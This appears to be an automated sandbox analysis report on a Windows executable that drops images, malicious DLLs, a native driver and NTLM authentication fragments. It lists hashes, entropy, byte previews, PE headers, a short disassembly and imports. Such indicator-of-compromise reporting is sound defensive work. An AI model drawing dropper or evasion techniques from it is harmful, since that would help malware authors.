                                                  Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                  Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):28272
                                                  Entropy (8bit):7.711602399715616
                                                  Encrypted:false
                                                  SSDEEP:384:9qegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQq:J5F1FUdy422IK+gAZt2i0YPpQn4GMN
                                                  MD5:118BC88C54125F7AD49C190766A982DD
                                                  SHA1:0CD10C14C1C0E3704F5F0DF6B71F7ADC3C138C2D
                                                  SHA-256:9F758E11F23A7C256AE4955A406D8EFC51840BC6D7128F9B007CAF9EF7781132
                                                  SHA-512:7B9D47CEADCD600825C3F29E35DA493D81ADD9AB54DF7A003EE1525A4B46BF485B21AFCD1892562244D9A9B392D29C8B838780F1DD3400274338F403258B2501
                                                  Malicious:false
                                                  Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb..bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
                                                  Process:C:\Users\user\Documents\7tqorj.exe
                                                  File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):5062442
                                                  Entropy (8bit):7.999518892518095
                                                  Encrypted:true
                                                  SSDEEP:98304:GIusCrIENkeXPV97kqmCf4P48E37aREUXr7VYyUOhez2IlpmURniNmJ:Xngv7NmCAPLTREQVb8/RomJ
                                                  MD5:70C21DA900796B279A09040B00953E40
                                                  SHA1:7CD3690B1FDDE033CD47E657FC4FC3A423DF716F
                                                  SHA-256:901330243EF0F7F0AAE4F610693DA751873E5B632E5F39B98E3DB64859D78CBC
                                                  SHA-512:851F4ED843F5D47C93D6C5A7D1895A674B6448631B567A0CCB2DF5873E4A5E722F28ECFC4D0D3220A86309481F9793FCDDA4F89BD993FB79CD09DBED29423752
                                                  Malicious:false
                                                  Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                  Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                  File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):10681
                                                  Entropy (8bit):7.866148090449211
                                                  Encrypted:false
                                                  SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                                                  MD5:10A818386411EE834D99AE6B7B68BE71
                                                  SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                                                  SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                                                  SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                                                  Malicious:false
                                                  Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                  Process:C:\Users\user\Documents\7tqorj.exe
                                                  File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):37274
                                                  Entropy (8bit):7.991781062764932
                                                  Encrypted:true
                                                  SSDEEP:768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
                                                  MD5:6D4DEB9526F3973DE0F9DCE9392F8EA7
                                                  SHA1:520128FB9BAB7064BEA992E4427B924073E58C0E
                                                  SHA-256:B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
                                                  SHA-512:F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
                                                  Malicious:false
                                                  Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                                  Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):133136
                                                  Entropy (8bit):6.350273548571922
                                                  Encrypted:false
                                                  SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                                  MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                  SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                                  SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                                  SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                  File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):3889557
                                                  Entropy (8bit):7.999938755349516
                                                  Encrypted:true
                                                  SSDEEP:98304:QAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:7ndLOZS/DtpPJRO8OHBL4f2UQI+A
                                                  MD5:43DE3D9240BC9EFF46E37A21DF2A5968
                                                  SHA1:061C42B2B9DE7509D32267F9A2E58D46A7D3209F
                                                  SHA-256:CB165C8CF8A42EE8FFA1F5FEF2E8E2323F4C9CEA054D7BEA5F0547D4EEDE2A2B
                                                  SHA-512:70036157A7772B5EEE5F82F7DA5819105E9D094722B97FB76096556E04E6B462F2F671256B992412DFB48FEC3D7024EA2004CA1565C0E4F2AD9726058CFB22B5
                                                  Malicious:false
                                                  Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q/.K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                                  Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                  File Type:GIF image data, version 89a, 10 x 10
                                                  Category:dropped
                                                  Size (bytes):8228
                                                  Entropy (8bit):7.978936157803007
                                                  Encrypted:false
                                                  SSDEEP:192:/Bue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:/BuNhyTlBU2dp+1XrBuCgp9vU0l
                                                  MD5:BA3D8FF6AE27DF65E34515D3993E22E3
                                                  SHA1:2C24AAACACD63700866909501AB532346EADE9BD
                                                  SHA-256:94C945D034C63A02817B7CA16B7BE9A4BFC26AB3461323ED9B31D99F7ADA31AB
                                                  SHA-512:5F2A20231B890B08E3EEC0E12E68EB8F12793E4BF26BC1976FA5670A7A7F0AF353FE0B16F12F600A29F7DE9B336BDB044F17FBBA6CA4E02C1B1B9EEAC2311C64
                                                  Malicious:false
                                                  Preview:GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI
                                                  Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):122880
                                                  Entropy (8bit):6.0020684822150825
                                                  Encrypted:false
                                                  SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52Fe:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5ge
                                                  MD5:DE1A402C0336BE65B84DB0B73BAEE49B
                                                  SHA1:89728AF0776D907A9415F313658D8F32BCB434BF
                                                  SHA-256:74EA27DF8450DC259BBFB94C84740415E51606E07CA954C80D7209AE38FECFDE
                                                  SHA-512:DD818C23F8BE4DF0076EAAE40C224D8D762B147CE15E5F362AB109BEBFDD935A6B4580D09910CAAD64BDF98C6AF003CC2AD5AB467A670690956030A512C30FDB
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):28272
                                                  Entropy (8bit):6.228874608676476
                                                  Encrypted:false
                                                  SSDEEP:384:M3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/Z:MOUkgfdZ9pRyv+uPzCMHo3q4tDghT
                                                  MD5:7E9CCF55E523A3D53F71670F33490252
                                                  SHA1:592AF92C23EF53669E28370F95DD002C6BDBEC81
                                                  SHA-256:FF12D710D42E4F461E10177BDDACA2249D8225A493CA11081E39CE8084AABB74
                                                  SHA-512:D470F922061EC8A7A1274A069F76D50FE7604EAD781A0A3DF2383418D873048634AB146B866FFACDBB1D7EC2FBB8D2B836F52E1FD72022FB66D9B9697EFB22D5
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l................................................w..........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):2
                                                  Entropy (8bit):1.0
                                                  Encrypted:false
                                                  SSDEEP:3:y:y
                                                  MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                  SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                  SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                  SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                  Malicious:false
                                                  Preview:..
                                                  Process:C:\Program Files (x86)\qNHTRl\qNHTRl.exe
                                                  File Type:GLS_BINARY_LSB_FIRST
                                                  Category:dropped
                                                  Size (bytes):300
                                                  Entropy (8bit):4.443567906829903
                                                  Encrypted:false
                                                  SSDEEP:3:ri9H5tH//lll1siQg4d1ywsiQI5kZt8jtl/zi8tkHsl/3lP92lbrisZ4mAUWKzn3:ri9HHTwPYtyjtOsV39YBPZaoiwH
                                                  MD5:BB9D1B9FDA8E749C96539DB611C23C24
                                                  SHA1:0C64FDD80A0A07AAEFDE7CD39570752931A23291
                                                  SHA-256:7292EEC2ACFF791FF5988D1C88DCF0CC90D88E103556F0F2169235B789EF0107
                                                  SHA-512:A0D3A9BD7FD0E69BEF479F0D5B30E2C20D4A9BF6ECC8FE828F2B514B41B460EACB5BFC3C6D8E2A4E20282ABD34BB9711DD854F150202DF7AA93DB9B80FB9F87A
                                                  Malicious:false
                                                  Preview:..........<.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP.............3.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ..........x.|.^>._
                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Entropy (8bit):0.08192237708325625
                                                  TrID:
                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                  • DOS Executable Generic (2002/1) 0.92%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:2749837485743-7684385786.05.exe
                                                  File size:30'885'376 bytes
                                                  MD5:5b695fabfcd1da54f7c193ef5f11ef6a
                                                  SHA1:8097a65d6e89522851b53b831aaf45afb9f0267b
                                                  SHA256:697d0f16d16ac7df2254469ab782d57a121c487ddaacca4a71f82bd976490ff2
                                                  SHA512:1f917fbed3c8a8b0d4896ed2dddd4040fb91565ee40c7513ebccd0ebd0371a860fcb5b1cb63fbfdbfa6ed2869cbaa400a27afbdeb47c78d4539579dc738ef37a
                                                  SSDEEP:3072:yBz0z6OFlTEzEQUZFtabsn8cZ1YQpjZoSc2faC1r/wDJPjYR+rH/:yd0GulTEo3tao8k1xv3aC1r+jYR+T
                                                  TLSH:77679F5A326410F9D5BFD178C9A20A46D772B866437293CF063446AADF337D0AD3B362
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C+...J...J...J....O..J...2B..J...J..zJ....z."J....{.jJ....K..J....L..J..Rich.J..........................PE..d...i..N..........#
                                                  Icon Hash:00928e8e8686b000
                                                  Entrypoint:0x140008c38
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x140000000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x4EF3A569 [Thu Dec 22 21:47:21 2011 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:2
                                                  File Version Major:5
                                                  File Version Minor:2
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:2
                                                  Import Hash:e055d655d830344970c4208138facfc1
                                                  Instruction
                                                  dec eax
                                                  sub esp, 28h
                                                  call 00007F6BC0B5CAB4h
                                                  dec eax
                                                  add esp, 28h
                                                  jmp 00007F6BC0B5059Eh
                                                  int3
                                                  int3
                                                  dec eax
                                                  mov dword ptr [000146F5h], ecx
                                                  ret
                                                  dec eax
                                                  mov dword ptr [esp+10h], ebx
                                                  dec eax
                                                  mov dword ptr [esp+18h], esi
                                                  push ebp
                                                  push edi
                                                  inc ecx
                                                  push esp
                                                  dec eax
                                                  lea ebp, dword ptr [esp-000004F0h]
                                                  dec eax
                                                  sub esp, 000005F0h
                                                  dec eax
                                                  mov eax, dword ptr [00012AF8h]
                                                  dec eax
                                                  xor eax, esp
                                                  dec eax
                                                  mov dword ptr [ebp+000004E0h], eax
                                                  inc ecx
                                                  mov edi, eax
                                                  mov esi, edx
                                                  mov ebx, ecx
                                                  cmp ecx, FFFFFFFFh
                                                  je 00007F6BC0B58167h
                                                  call 00007F6BC0B5CB16h
                                                  and dword ptr [esp+70h], 00000000h
                                                  dec eax
                                                  lea ecx, dword ptr [esp+74h]
                                                  xor edx, edx
                                                  inc ecx
                                                  mov eax, 00000094h
                                                  call 00007F6BC0B578DBh
                                                  dec esp
                                                  lea ebx, dword ptr [esp+70h]
                                                  dec eax
                                                  lea eax, dword ptr [ebp+10h]
                                                  dec eax
                                                  lea ecx, dword ptr [ebp+10h]
                                                  dec esp
                                                  mov dword ptr [esp+48h], ebx
                                                  dec eax
                                                  mov dword ptr [esp+50h], eax
                                                  call dword ptr [0000D581h]
                                                  dec esp
                                                  mov esp, dword ptr [ebp+00000108h]
                                                  dec eax
                                                  lea edx, dword ptr [esp+40h]
                                                  dec ecx
                                                  mov ecx, esp
                                                  inc ebp
                                                  xor eax, eax
                                                  call 00007F6BC0B643EDh
                                                  dec eax
                                                  test eax, eax
                                                  je 00007F6BC0B58199h
                                                  dec eax
                                                  and dword ptr [esp+38h], 00000000h
                                                  dec eax
                                                  mov edx, dword ptr [esp+40h]
                                                  dec eax
                                                  lea ecx, dword ptr [esp+60h]
                                                  dec eax
                                                  mov dword ptr [esp+30h], ecx
                                                  dec eax
                                                  lea ecx, dword ptr [esp+58h]
                                                  dec esp
                                                  mov ecx, eax
                                                  Programming Language:
                                                  • [ASM] VS2010 SP1 build 40219
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [C++] VS2010 SP1 build 40219
                                                  • [ C ] VS2010 SP1 build 40219
                                                  • [RES] VS2010 SP1 build 40219
                                                  • [LNK] VS2010 SP1 build 40219
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1a3140x78.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d7a0000x5c8.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d790000xfb4.pdata
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x164400x1c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x160000x3d0.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x1424e0x144002818c01f5b3619f5d08841e50f9f34aeFalse0.5304542824074074data6.38689177603382IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x160000x4fb20x5000b5004cfda8e71f2299dfabff87abc568False0.343359375data4.861556529219821IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0x1b0000x1d5d6000x1d59800c3446221fb4627522fbc3e5c902154fdunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .pdata0x1d790000xfb40x1000a1ff09aebd65854c71ab76238d270b83False0.485595703125data4.980072699437705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .rsrc0x1d7a0000x5c80x60056a4da9c71a7d95e35ee0ccb4e062a95False0.419921875data4.212061586306468IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_VERSION0x1d7a0a00x3ccdataEnglishUnited States0.411522633744856
                                                  RT_MANIFEST0x1d7a46c0x15aASCII text, with CRLF line terminatorsEnglishUnited States0.5491329479768786
                                                  DLLImport
                                                  KERNEL32.dllDisconnectNamedPipe, ConnectNamedPipe, ReadFile, GetExitCodeProcess, WaitForSingleObject, CreateProcessW, IsBadStringPtrW, WideCharToMultiByte, SetThreadPriority, GetCurrentThread, CreateNamedPipeW, Sleep, InitializeCriticalSection, DeleteCriticalSection, SetPriorityClass, GetCurrentProcess, FreeLibrary, CreateFileW, LoadLibraryA, EnterCriticalSection, GetProcessHeap, SetEndOfFile, GetStringTypeW, LCMapStringW, SetFilePointer, MultiByteToWideChar, WriteConsoleW, HeapReAlloc, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, GetLastError, WaitNamedPipeW, CloseHandle, GetSystemTime, GetTempPathW, GetProcAddress, GetModuleFileNameW, GetConsoleMode, GetConsoleCP, SetStdHandle, HeapSize, GetSystemTimeAsFileTime, GetCurrentProcessId, GetTickCount, LeaveCriticalSection, WriteFile, FlushFileBuffers, ExitThread, ResumeThread, CreateThread, GetModuleHandleW, ExitProcess, DecodePointer, GetCommandLineA, GetStartupInfoW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, TerminateProcess, HeapFree, HeapAlloc, RaiseException, RtlPcToFileHeader, RtlUnwindEx, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, FlsGetValue, FlsSetValue, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, LoadLibraryW, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapSetInformation, GetVersion, HeapCreate, VirtualAlloc
                                                  USER32.dllwsprintfW, PostMessageW, MessageBoxW, PostQuitMessage, DefWindowProcW, EndPaint, GetMessageW, TranslateMessage, DispatchMessageW, CreateWindowExW, ShowWindow, UpdateWindow, RegisterClassExW, BeginPaint
                                                  GDI32.dllStartDocW, StartPage, EndPage, EndDoc, DeleteDC, CreateDCW
                                                  WINSPOOL.DRVClosePrinter, DocumentPropertiesW, GetPrinterDriverW, OpenPrinterW
                                                  ADVAPI32.dllSetSecurityDescriptorDacl, GetUserNameW, InitializeSecurityDescriptor
                                                  Language of compilation systemCountry where language is spokenMap
